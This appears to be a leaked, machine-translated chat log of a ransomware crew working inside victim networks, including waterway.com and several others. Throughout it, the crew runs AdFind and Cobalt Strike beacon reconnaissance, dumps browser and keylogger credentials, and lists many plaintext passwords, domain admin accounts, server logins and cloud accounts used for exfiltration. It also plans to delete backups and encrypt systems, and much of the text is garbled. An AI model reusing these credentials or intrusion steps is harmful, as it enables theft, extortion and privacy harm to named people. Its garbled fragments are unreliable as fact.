C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=organizationalUnit)" 1>ad_ous.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -subnets -f (objectCategory=subnet) 1>subnets.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -f "(objectcategory=group)" 1>ad_group.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.

C:\ProgramData\Adobe>adfind.exe -gcb -sc trustdmp 1>trustdmp.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015

LDAP_BIND: [] Error 0x31 (49) - Invalid Credentials
Terminating program.


but does not allow to remove hell? all pinged did not check it pinged? when taking data wrote that the controller is not available just dk is not available? i did not find the software for vpnhm, behind vpnom? domain is not available kerbs are not removedthere is an exh in the network? ad info updated? kerbs reshot and so on found the credits for the transition. Brut on the list interrupted hangs PC (does not go to them, but for some reason shows it not adminshare trap adminshare there ``.
\TIMECLOCKSQL.pkgprod.local\ADMIN$ - Remote Admin
\TIMECLOCKSQL.pkgprod.local\C$ - Default share
\TIMECLOCKSQL.pkgprod.local\IPC$ - Remote IPC

[+] received output:
\FRONTDESK.pkgprod.local\ADMIN$ - Remote Admin
\FRONTDESK.pkgprod.local\C -
\\Default share
\\{\FRONTDESK.pkgprod.local\D$ - Default share
\FRONTDESK.pkgprod.local/IPC$ - Remote IPC
\\Print$ - Printer Drivers
\FRONTDESK.pkgprod.local/Users -

[+] received output:
\Sales2-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\Sales2-HP-2019.pkgprod.local\C$ - Default share
\Sales2-HP-2019.pkgprod.local\IPC$ - Remote IPC
\Sales2-HP-2019.pkgprod.local\print$ - Printer Drivers
\Sales1-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\Sales1-HP-2019.pkgprod.local\C$ - Default share
\Sales1-HP-2019.pkgprod.local\IPC$ - Remote IPC
\Sales1-HP-2019.pkgprod.local\print$ - Printer Drivers
\\{\PKG-102.pkgprod.local\ADMIN$ - Remote Admin
\\{\PKG-102.pkgprod.local\C$ - Default share
\\{\PKG-102.pkgprod.local\D$ - Default share
\\{\PKG-102.pkgprod.local\E$ - Default share
\PKG-102.pkgprod.local\IPC$ - Remote IPC
\PKG-102.pkgprod.local\print$ - Printer Drivers

[+] received output:
\PKG-101.pkgprod.local\ADMIN$ - Remote Admin
\PKG-101.pkgprod.local\C$ - Default share
\PKG-101.pkgprod.local\D$ - Default share
\PKG-101.pkgprod.local\E$ - Default share
\\{\PKG-101.pkgprod.local\G$ - Default share
\PKG-101.pkgprod.local\IPC$ - Remote IPC
\\Print$ - Printer Drivers
\\{\Barbara-HP-2019.pkgprod.local\ADMIN$ - Remote Admin
\\{\Barbara-HP-2019.pkgprod.local\C$ - Default share
\Barbara-HP-2019.pkgprod.local\IPC$ - Remote IPC
\Barbara-HP-2019.pkgprod.local\print$ - Printer Drivers
\\2k12server.pkgprod.local/ADMIN$ - Remote Admin
\2k12server.pkgprod.local\C$ - Default share
\2k12server.pkgprod.local\IPC$ - Remote IPC
\\{\2k12server.pkgprod.local/NETLOGON - Logon server share
\2k12server.pkgprod.local\Shares -
\2k12server.pkgprod.local\SYSVOL - Logon server share

``We're still looking for other options about clearing out the exe, tomorrow we'll decide ``C:\Users\jess\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1`` have you heard anything from them?
172.93.109.18:51630
S36rQDbsTVH7D62swcBBexyxGkbNBFalsgx
``give me kobukak too many fuck-ups setoknu if off, then give me then also grid#skytechinc-com from esxi looking for#henrystreet-org creeds from the sphere looking for so what are you doing? hiuser3 stuck in traffic, but so all come? hi:space_invader:all say goodnight do tomorrowto 5okay then for today alla, got them in the network 5 not, there are only three in the sphere[ ](https://mediaeveryonecom/channel/general?msg=La7JvzhF8okm35g2o) mb to dump? and some creeds are from trastav #corp-televisa-com-mx untwisted and snuck into the servak, got new creeds, tomorrow as someone will be available on the other machine and think the DK will getaustavlja to find kerds from two esxi and everything is ready
found two more nasa with backups, 4 in total
found the kerds from the sphere, there are three esxi, but there are 5 on the network, we need to find 2 more passwords #henrystreet-org scanned the ports and checked all the web mordas, no esxi and sphere, the kerds are in progress. Of at least something worthwhile I found:
```
https://login.symantec.com/sso/idp/SAML2
    it@henrystreet.org
    Hs$54321

https://my.vmware.com/web/vmware/login
    amendez@henrystreet.org
    H$$54321
``Describe what you've done today.
[*] Beginning Google Chrome extraction.

--- Chromium Credential (User: mharper) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : map@waterway.com
Password : 7KA8JN&XHD4s

--- Chromium Credential (User: mharper) ---
URL : https://www.waterway.com/shop/my-account/
Username : markharper
Password : waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://www.waterway.com/shop/my-account/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://github.com/session
Username : mharper@waterway.com
Password : LoveUnit14

--- Chromium Credential (User: mharper) ---
URL : https://internal.waterway.com/login
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://myaccount.google.com/
Username : waterwayapps@gmail.com
Password : wWj(9WZ&f}#z8}w^

--- Chromium Credential (User: mharper) ---
URL : https://www.paypal.com/signin
Username : markharper.pwlonghorns@gmail.com
Password : 88Maybe253!

--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : waterwaytesting@gmail.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : markharper@markharper.net
Password : LoveUnit14

--- Chromium Credential (User: mharper) ---
URL : https://login.rackspace.com/
Username : wwMHarper
Password : Waterway99

--- Chromium Credential (User: mharper) ---
URL : https://stage.internal.waterway.com/login
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://ww5.autotask.net/ClientPortal/Login.aspx
Username : mharper@waterway.com
Password : LoveUnit14!

--- Chromium Credential (User: mharper) ---
URL : https://mockflow.com/checkLogin.jsp
Username : map@waterway.com
Password : 7KA8JN&XHD4s

--- Chromium Credential (User: mharper) ---
URL : https://sso-prod.insite360.gilbarco.com/auth/realms/people/login-actions/authenticate
Username : mharper@waterway.com
Password : LoveUnit14

--- Chromium Credential (User: mharper) ---
URL : https://login.live.com/ppsecure/post.srf
Username : waterwaytesting@gmail.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://internal.waterway.com/login
Username : markharper
Password : waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://www.amazon.com/ap/signin
Username : mharper@waterway.com
Password : 88Maybe253!

--- Chromium Credential (User: mharper) ---
URL : https://smile.amazon.com/ap/signin
Username : mharper@waterway.com
Password : 88Maybe253!

--- Chromium Credential (User: mharper) ---
URL : https://marketing.waterway.com/Account/Login
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://www.sendrecurring.com/login
Username : map@waterway.com
Password : JE04lvSfoZ5u

--- Chromium Credential (User: mharper) ---
URL : https://account.ui.com/login
Username : WaterwayIT
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#

--- Chromium Credential (User: mharper) ---
URL : https://accounts.google.com/signin/v2/challenge/password/empty
Username : waterwayapps@gmail.com
Password : wWj(9WZ&f}#z8}w^

--- Chromium Credential (User: mharper) ---
URL : https://prtg.waterway.com/public/checklogin.htm
Username : mharper@waterway.com
Password : Waterway99

--- Chromium Credential (User: mharper) ---
URL : https://www.deskperk.com/account/login/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL :
Username : markharper.pwlonghorns@gmail.com
Password : 88Maybe253

--- Chromium Credential (User: mharper) ---
URL :
Username : mharper98
Password : 88Maybe253

--- Chromium Credential (User: mharper) ---
URL : https://id.logi.com/
Username : mharper@waterway.com
Password : LoveUnit14%

--- Chromium Credential (User: mharper) ---
URL : https://ncentral.waterway.com/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL : https://ncentral.waterway.com/
Username : mharper@waterway.com
Password : Waterway99!

--- Chromium Credential (User: mharper) ---
URL :
Username : mharper@waterway.com
Password : LoveUnit14%

[*] Finished Google Chrome extraction.

[*] Beginning Edge Extraction.

--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#

[*] Finished Edge extraction.

[*] Done.
```
```
[*] Beginning Google Chrome extraction.

--- Chromium Credential (User: gkeller) ---
URL : https://designcloud.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

--- Chromium Credential (User: gkeller) ---
URL : https://login.microsoftonline.com/common/login
Username : gkeller@waterway.com
Password : W

--- Chromium Credential (User: gkeller) ---
URL : https://id.atlassian.com/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : http://pdiprodweb/FocalPoint/Login.aspx
Username : waterway\gkeller
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://github.com/session
Username : gkellerww
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://smartscan.controlscan.com/security/login
Username : 650000010503764
Password : u7i2jwPWZdfCwcU

--- Chromium Credential (User: gkeller) ---
URL : https://waterway.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://waterway1578930554.zendesk.com/access/login
Username : gkeller@waterway.com
Password : GKoct2015!

--- Chromium Credential (User: gkeller) ---
URL : https://www.mockflow.com/checkLogin.jsp
Username : gkeller@waterway.com
Password : Waterway99

[*] Finished Google Chrome extraction.

[*] Done.
```
```
[*] Beginning Google Chrome extraction.


[+] received output:
--- Chromium Credential (User: mapusatera) ---
URL : https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*

--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X

--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew

--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-

--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH

--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123\

[*] Finished Google Chrome extraction.

[*] Beginning Edge Extraction.

--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r

--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj

--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42

[*] Finished Edge extraction.

[*] Done.
```
```
[*] Beginning Google Chrome extraction.


[+] received output:
[*] Finished Google Chrome extraction.

[*] Done.
``Just leave the proxy you gave me for the mail server sessions and the rest of them will probably be on pnsvejsdemand me their browsers again''.
  CurrentUser : WATERWAY\mharper
  Idletime : 00h:46m:59s:672ms (2819672 milliseconds)
```
```
  CurrentUser : WATERWAY\gkeller
  Idletime : 02h:09m:38s:235ms (7778235 milliseconds)
```
```
  CurrentUser : WATERWAY\mapusatera
  Idletime : 06h:51m:32s:968ms (24692968 milliseconds)
```
```
  CurrentUser : WATERWAY\djarden
  Idletime : 03h:05m:02s:093ms (11102093 milliseconds)
``Screens - lock screen with no movement? If they do not come, then we roll over for half an hour, monitor the servers until the session sleeps for a longer interval still hope that they will come for half an hour readiness they have gone .... this is gkeller`` ``
====== IdleTime ======

  CurrentUser : WATERWAY\gkeller
  Idletime : 01h:43m:42s:781ms (6222781 milliseconds
``wait a minute exactly greega the rest are alive?`` bliaoff comp7harper is out5 minutes ready slack accesses are there? @ot wake up you lost a screenshot of harperdate where do we have office? screenshots are taken regularly and check for shuughts you watch for admins active in 10 minutes we will write10 mins great server now what was backups? backups are ready?
disk raster ready
nimbles are open nimblc and rock spice are ready[ ](https://mediaeveryone.com/group/waterway-com?msg=Jzd3FE6Gachm5XwXx) ?you know what to prepare? ready 10 mins vpnom problems so fardid you deploat the batnom kill the processes?
WWDC2.waterway.com [192.168.0.222]
WWDC1.waterway.com [192.168.0.228]
PDIPRODWEB.waterway.com [192.168.0.192]
PDIPRODSQL.waterway.com [192.168.0.191]
PDITESTSQL.waterway.com [192.168.0.127]
WWSQL.waterway.com [192.168.0.189]
WWSQL2.waterway.com [192.168.0.213]
WWSQL02.waterway.com [192.168.0.59]
REPORTING.waterway.com [192.168.0.217]
WWSQL2OLD.waterway.com [192.168.0.83]
PDIPRODWEB2016.waterway.com [192.168.0.60]
WW2K1.waterway.com [192.168.0.204]
WWHV-CLUSTER-1.waterway.com [192.168.0.8]
WWHV-CLUSTER-2.waterway.com [192.168.0.7]
WWHV01.waterway.com [192.168.0.6]
WWHV02.waterway.com [192.168.0.190]
WWHV03.waterway.com [192.168.0.1]
WWHV04.waterway.com [192.168.0.2]
WWHV63.waterway.com [192.168.63.20]
```
servers``
104.243.37.111 (Windows 2019 Standard x64)
u: Administrator
p: BXj0o3XD8JbXeXH
``````
104.171.117.198 (Windows Server 2012 x64)
u: Administrator
p: l037zI#fU.MX
``````
23.92.210.210
u: Administrator
p: fmsbS4wy6NaASrTu
``I'm giving you access to 3 locations. Didn't you find a backup? Let's ping them all and be ready to go. Thanks @user4 there is already SharpSharesNG so you can prepare automation of the Deployment of the Domain Admins Deployment Script
```
    WATERWAY\djarden MyNewPassword6
    WATERWAY\Quser pdiC1137qu!
    WATERWAY\Administrator 1853Gators
    WATERWAY\datavault Waterway727
    WATERWAY\domainrestore Waterway727
    WATERWAY\mapusatera Gators1853
    WATERWAY\veeam_admin 99Waterway
    WATERWAY\Applied Waterway99
    WATERWAY\DBunte Waterway99
    WATERWAY\gkeller Waterway76
    WATERWAY\SEnglert Waterway99!
    WATERWAY\blauer 11915Admin2179!
    WATERWAY\mharper LoveUnit14
``Or if you drop the coba you will have a vpn immediately run the build so if the paleo starts (will monitor the admins) and you will already be on the servers by this time so we will throw vpn in the net there) I said will not turn us immediately after the letter about nimbles?all 5 people in the case, between you distribute the role of all on the timing, you need to do almost instantly all do not forget to delete all external backs that were in case they drop the kobut e you run on the machine dll, I give you ovpn configs + dedication, you all up and here you are behind a wpn in the network 2 entry points in this case I prepare you a wpn bridges to the networkThe important thing is that during a raid, the cobu can be dropped from the networka, yes, okie mapping will not even have) armas you can share over the network so here timing is very important may raise a raid and we will have little time to the lock[ ] (https://mediaeveryone.com/group/waterway-com?msg=idpvE2JA95NfNYsao) + zamaplyene armas? or lock without nimble and lock or we get a pass from nimble and do remuv all bakaptut everything simpleto just run the build by this time you should be attracted to all servers in kobucha got access immediately logged in sketched backups with the file size if any and deleted all that can ``
WWDC2
WWDC1


MSSQL--

PDIPRODWEB
PDIPRODSQL
PDITESTSQL
WWSQL
WWSQL2
WWSQL02
REPORTING
WWSQLOLD
WWSQL2OLD


TERMSRV--

PDITESTWEB
WATERWAYDSC02
WW2K1OLD
PDIPRODWEB2016
WW2K1


Hyper-V Server--

WWHV-CLUSTER-1
WWHV-CLUSTER-2
WWHV01
WWHV02
WWHV03
WWHV04
WWHV63
``and you wait for accesses to do everything in +- 1-2 minutes e.g. sox + url vbits prepare accesses to nimbla at once''.
on AD
total cars - 310
win serv - 16
hyper-v server - 7
arm - 287
``out of the two that I have discounted immediately here build give me one server and user? ok, let's break down the strategy they have time out 30 minutes sawdjarden with her browser checked? mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=eYrHKvzmgSGPvEQs7) whose dock? ``MS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!`` everything works, do not confuse me ``MS.Outlook.15:djarden@waterway.com\djarden@waterway.com DJarden6* ``she has the keylog hanging from it did you see her car?
dn:CN=Dianne Jarden,OU=OfficeUsers,OU=Corporate,DC=waterway,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Dianne Jarden
>sn: Jarden
>description: IT
````MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915Admin2179!``I will find валидныеошибкаМЅ.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915ITMan2179! writes error``
blauer
gkeller
mharper
mpusatera
``who had the nimble?
mail.datotel.com\tweiskopf@waterway.com Weiskopf2583#
mail.datotel.com\customercare@waterway.com Wc#2020!
``````
MS.Outlook.15:blauer@waterway.com\blauer@waterway.com 11915Admin2179!
MS.Outlook.15:djarden@waterway.com\djarden@waterway.com DJarden6*
MS.Outlook.15:gkeller@waterway.com\gkeller@waterway.com GKoct2015!
MS.Outlook.15:mharper@waterway.com\mharper@waterway.com LoveUnit14
MS.Outlook.15:mpusatera@waterway.com\mpusatera@waterway.com Gators1853
MS.Outlook.15:tweiskopf@waterway.com\tweiskopf@waterway.com Weiskopf2583
``@user7 for how long? I need his mail and the mail of the second cunt tickets are created to help or something like that I think it is HelpDesc*nogo anyway yanked from the neo mharper[ ](https://mediaeveryone.com/group/waterway-com?msg=ERNTLyZqow7H3bsNB) do not think he is a living person mainly at @user7
he's gone
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
``setg Proxies socks4:185.150.189.165:29528 give me the socks and access to the mail guys on the nimblyw slack? mail is quiet? nothing in the keylog, unless they run around the office and ask if the shuheradmins lifted the shukheeratorak web so sshern there and not the brute
in the lock ip flies away after +- 10 tries as well as rootv loginsadmins still with a capital letter into the prelocke batnick throw a kilo process asus service backupafter an hour discuss a plan of action because here the approach is not trivialda[ ](https://mediaeveryone.com/group/waterway-com?msg=oo9XiRA9tCdeANuK8) has not yet
we'll do it soonthere was an archive with files? start at 1:30https://192.168.0.75/#/loginна mail i only saw the alert of successful authorization for the 20th year so you were brutal before that there were alerts? in general before the brutal question
they have an alert at the entrance to the mail
There's a good chance there'll be an alert on the override/erroneous pass as well.
is it worth it?
mega.nz

WATERWAY.COM SQL .bak
                 ztclmgplmwfqmcjqfn@wqcefp.com
                 745jkiJIGSFjer67

WATERWAY.COM outlook
                 ribom53736@vy89.com
                 Mdu7IJ8wQ5ktG3HS4Vzuase1314212
``admin admin and root logins of the two utakkova think max diap 5 variants is not clear which login is needed.The problem is also that I tried with different variations of login (with @ with \ and just login) let's go back to the idea of bruta say that in the monitoring shows that they are in vg, as well as nasa so can it in vg then?)in ad_computers not see in ad_computers is?
```
nimbles:
    https://192.168.0.42
    https://192.168.0.43
    https://192.168.0.75
    https://192.168.0.77
``Is it in the AD as such? Is nimbles in the domain? Maybe unlimited but on the other hand, how many login attempts have we made on nimbles are tied to adno by known data is it in the domain is on nimbles?
Lockout threshold: 15

``there is an unlimited number of attempts? + all the hashes from the domain and brute force let's collect the top passwords in the last couple of years, even 16 in hell and on the servers wild garbage removed as a grid dalitak and was, on hell17 servers? and before that and was? or they got wind of it? on backups
all the computers on the network with "backup" either don't piggyback or don't get it.
The few that are alive are on the c drive and there's no backup.
Only 17 servers, I found only database backups, site, etc.
I'll check with workgroup, but I have a feeling that they either pour backups into nimbrel
or do not do them at all :) which is unlikely, because computers with a prefix backups give the impression that they are restored from the backups, so they are called that and burn)
Teemo[WWSQL]SYSTEM */976|2021Jan15 03:11:21> portscan 192.168.0.105 1-10000 icmp 1024
[*] Tasked beacon to scan ports 1-10000 on 192.168.0.105
[+] host called home, sent: 93285 bytes
[+] received output:
Scanner module is complete
``````
 Teemo[WWSQL]SYSTEM */976|2021Jan15 03:09:54> shell net view \192.168.0.105 /all
[*] Tasked beacon to run: net view \\192.168.0.105 /all
[+] host called home, sent: 60 bytes
[+] received output:
System error 53 has occurred.

The network path was not found.

``No view does not work, 3389 does not work, no other ports looked at?
Description = The RPC server is unavailable.


``what's up with rps and no view? backups without 445``
beacon> shell ping -n 1 CLEBACKUP.waterway.com
[*] Tasked beacon to run: ping -n 1 CLEBACKUP.waterway.com
[+] host called home, sent: 75 bytes
[+] received output:

Pinging CLEBACKUP.waterway.com [192.168.0.105] with 32 bytes of data:
Reply from 192.168.0.105: bytes=32 time=7ms TTL=64

Ping statistics for 192.168.0.105:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 7ms, Average = 7ms

beacon> portscan 192.168.0.105 445,21,22,3389,443
[*] Tasked beacon to scan ports 445,21,22,3389,443 on 192.168.0.105
[+] host called home, sent: 75377 bytes
[+] received output:
(ICMP) Target '192.168.0.105' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
``by the way
very interesting stuff.... but it won't compile
i'm looking for the code, this thing should theoretically work - https://github.com/amitwaisel/Malproxy/tree/master/ѕгсв patched)
tried a sox mimic and it didn't work as expected
I can't deploy VPN - cobalt won't deploy because win 10 doesn't support it.
Any other VPN client they do not use.so it makes sense to try it by the way on the lab as I remember dk not patchedbut you need to be absolutely sure that will work) in principle you can try it on labenea, I have not tried
if i try it now, there will be a big chance that already cleaned the network, because if now it will not work and the second time broke dk - admins something or something will suspect) `` ``
this line probably doesn't work because CS has an old mimic
```
and through soks or vpn not try to start the ac? on smbgost on the network - nothing left to fill upHe raised the form, configured.and tomorrow at 11 write down the result of today in the groupmaximum time to 11 canEveryone should go 1:30This is a very bad timea Why so early?tomorrow by 10 to 9Today I'm not long on computers How's it going? scanning subnets from ad_subnets - looking for where I admin read the documentation on psh empireDetail progress on the tasks I've done what I'll just deal with youIt turns out that only @user8 is free?i'm with the same sessionnu since the foprump then ok raise the foprump me asu.eu? apparently, i personally do not have a task yet finished with vpc just a few minutes ago, on the nets what you have on tasks?:space_invader:hi there,hi all hello$krb5tgs$23$*Adm-LarsonJa$na.kfy.com$MSSQLSvc/kfi-tfs-01.na.kfy.com 12!Password8prietvethe ok, Stalin said that he will be delayed by yesterday's business hours to 8 tomorrow waiting for a new rocket in the near future to decide how long will it be? but each computer has the appendixprivethe hey, we have when the last router died, we took a microtic and it somehow very bad works VPN from nord, the speed zhut. We are still using apps to connect, now we take another vpnprivet why vpn not on the router `[22][ssh] host: 89.0.10.104 login: root password: netgear1 `
is that NAS-D5-E2-B8 just now) I'm in all go to the other rock we keylogged them via SI catch on nimblebut will call to write water nimble? in 4 will nimbletam not before 6 okay you're right, but I will add that when I said about the ehe I laid down similar outcomes) I'm not to blame that the trick can not chew dll) do not beat a lying))))) what about the failure of ehe and fuck it how so ...aha got it, please let me know how it will be loaded - I have interruptions with cases for onlinenikov today(( they do not work with what (here I thought from the trike to take something, and a clean ehehe that do not have .... more last week agreed and today ustraget said it will, right? progruz, where the hzya read today, some new cases will be loaded with uk? as you there? hello `` Hello?
LEEFILTERS.UK
=============


Domain Controllers

LEEPDCVM
LEE-DCON-01

-------------------

Sage/SQL

LEESQL
LEESAGEVM
LEEAPPVM

-------------------

Backup Server

LEESTORE

-------------------

Qlikview Server
(Qlik provides an end-to-end platform which includes data integration, user-driven business intelligence and conversational analytics)

LEEQLIKVM
QVWEBLIVE
QVAPPLIVE
QVAPPTEST
LEEPUBAPP01

-------------------

EXCHANGE

LEEMAILVM

-------------------

File Storage Server

LEEDATA

-------------------
Replication Server

LEEREP
``For now, play with the testing tools please excuse me friends, with the sessions so far a little stupor, probably in a couple of hours will be solved maybe earlierwould give new sessions (okseny now will try to make up, backdoor fell off just
domain where the backdoor was dead all who were alive? goodnight goodnight goodnight no sessions. Will there be any new ones? Good morning:flag_il:Night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night-night.
https://vpn.floridapoly.edu
```
I'm on a VPN on my hard drive.
Checked the network for ms17\bluekeeper\smbghost (selectively) - all bypassed.
there is still a way to find out dc and check it on the zerologon so we will be late late we will close the network tomorrow by 3 write statuses in groups have tried several versions of ms17
no good. I've scanned the network.
There is one ``.
Host is likely VULNERABLE to MS17-010!
```
but
```
[-] 10.200.101.73:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
``message my status to the groupwho finished rdp only two snapshots, write the password and what can I do snapshot@tl1 add me to @user4 in the group pleasewill you restore the dedication, pack all data keepass, but how can I do to 9000 with vpn could hook up?)
like yesterday I'm digging in the dedicke, vpn yesterday's network deployed who do what? it's on the setting rpn do not create new users, change the pass and work with the current one is not enough from 2424? and I already put a new password of at least 30 characters, including letters, numbers and symbols @user4 network is almost dismantled, I must finish with her today. 2 people to help him will be allocated, there is a fairly large network so it is likely that today we will be a long time sessions are expected to check the power settings on the OS to not go to sleep then 10 it will not be a month I'm on the old place 2 people? 3,7,8 dropped the one that is possible to leave the 10 let it be 10lubomne 16 all on the spot write what granddick you want (10,16)
I'll give you access in person
you set up for yourself, install the software and change the password from your account
send me the new password
i give you a snapshot of the current state to be able to roll back to the configured arrow as soon as everythinga although let's not wait another 7 minutes the rest of it yes199.241.189.58 seems alive - i meant your basic that originally gave you stayed 2 already took away that temporary gave you which already have, it can keep? 3 vin 10 and 3 vin 16 rdp come up yet?
```
smb_version
rhosts="name_domain"
```
found slightly more cars than 1

There's ``mcklrh.mig:
```
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
[+] 192.168.254.107:445 - Host is running Windows 2003 R2 SP1 (build:3790) (name:NSERV4) (domain:MCKLRH)
```

Here ``ffmg.local'':
```
[+] 10.10.39.73:445 - Host is running Windows 2003 SP2 (build:3790) (name:CLINICDC) (domain:FFMG)
```

The existing EA (`svc-aadc`) does not have admin rights in both domains
```
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\svc-aadc:WH20s.admin 1225kofq'
```
```
[+] 10.10.39.73:445 - 10.10.39.73:445 - Success: 'lrhc\svc-aadc:WH20s.admin 1225kofq'
```
Checked for `ms17`:
Here `ffmg.local' is silent.
Here `mcklrh.mig ` there is a vulnerability on server 2003. I added LA, I couldn't get it to work in cob, or tpsh, or metapreter.
Tried to remove ADinfo, no luck. It either gave 0 objects, or hung, or with an ` ERROR: 0x1` error.
Tried to remove both by dropping the executable and remotely through:
```
-b DC=mcklrh,DC=mig
-h 192.168.254.107
```

I ran the loads through `wmic`, `psexec`, `ms17_010_command` - no hu me

So far there are only YES and EA lists from the `mcklrh.mig' domain

```
The request will be processed at a domain controller for domain mcklrh.mig.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator klr test3
testpacs
The command completed successfully.
```
```
The request will be processed at a domain controller for domain mcklrh.mig.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator ali
The command completed successfully.
``adfind.exe -f "(objectcategory=person)" -h x.x.x.x> ad_users.txt:thumbsup:to keep you from getting bored with the currentuser4user7 networks.
lrhc.local\gsnelson $Gateway56
lrhc.local\nmsapps dragon374
``````
Inbox - gkeller@waterway.com - Outlook
=======
inmbel
``````
Unit64OfficePC - [v. 7.00.21][#50200003524929] [0:00:03]
=======
ST0164[tab]ST0164
``````
https://192.168.63.1:8080/auth/login - Google Chrome
=======
b0ckTh15
admin
```
```
Zoom Meeting
=======
af[backspace]dmin[tab]bl0ckTh15
admin[tab]bl0ckTh15
```
```
Waterway 06 Office - [v. 7.00.21][#10100020974010] [0:00:48]
=======
06Blues
```

It looks like passwords are transmitted in the zoom
```
New Tab - Google Chrome
=======
Where to find [a[backspace][backspace]password is [backspace][backspace]n zoom
192.168.64.1[left][left][backspace][backspace]63
```


```
Waterway Gas & Wash - Google Chrome
=======
mpusatera@waterway.com[tab]w@terwA[backspace]!y
w@terw@y
Morgan914
Gators1853
1853Gators
mpusatera@waterway.com[tab]w@terw@y
[F12][delete]
mpusatera@waterway.com[tab]w@terw@y
I don't think we'll be able to close it tomorrow)) I'm still gathering information about it all.
